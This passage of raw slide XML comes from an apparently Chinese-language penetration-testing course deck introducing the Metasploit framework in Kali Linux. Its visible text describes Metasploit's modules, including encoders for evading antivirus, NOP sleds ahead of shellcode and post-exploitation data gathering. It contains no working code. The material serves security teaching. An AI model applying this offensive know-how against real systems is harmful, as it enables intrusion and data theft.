    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.了解Metasploit框架结构。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.了解Metasploit文件结构。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>在Kali Linux操作系统中认识Metasploit的体系框架。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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a:xfrm>
            <a:off x="4892396" y="1118051"/>
            <a:ext cx="6989445" cy="5594350"/>
            <a:chOff x="5965546" y="1754191"/>
            <a:chExt cx="6989445" cy="5594350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5965546" y="1815424"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6512281" y="2086296"/>
              <a:ext cx="6442710" cy="5262245"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Auxiliary：负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和DOS等功能的辅助模块。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Encoders：对Payloads进行加密并躲避防病毒检查的模块。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Exploits：利用系统漏洞进行攻击动作的模块，此模块对应每一个具体漏洞的渗透测试方法(主动、被动)。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Nops：提高Payloads稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时，常常要在真正要执行的Shellcode之前添加一段空指令区，从而当触发渗透攻击后跳转执行Shellcode时，有一个较大的安全着陆区，以便避免因内存地址随机化、返回地址计算偏差等造成Shellcode执行失败，提高渗透攻击的可靠性。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Payloads： Exploit操作成功之后，在目标系统执行真正的代码或指令的模块。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Post：后渗透模块。在取得目标系统远程控制权后，进行一系列的后渗透攻击动作，如获取敏感信息、跳板渗透等。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6677500" y="1754191"/>
              <a:ext cx="2791460" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Metasploit 功能模块介绍</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5966000" y="1859109"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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15" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
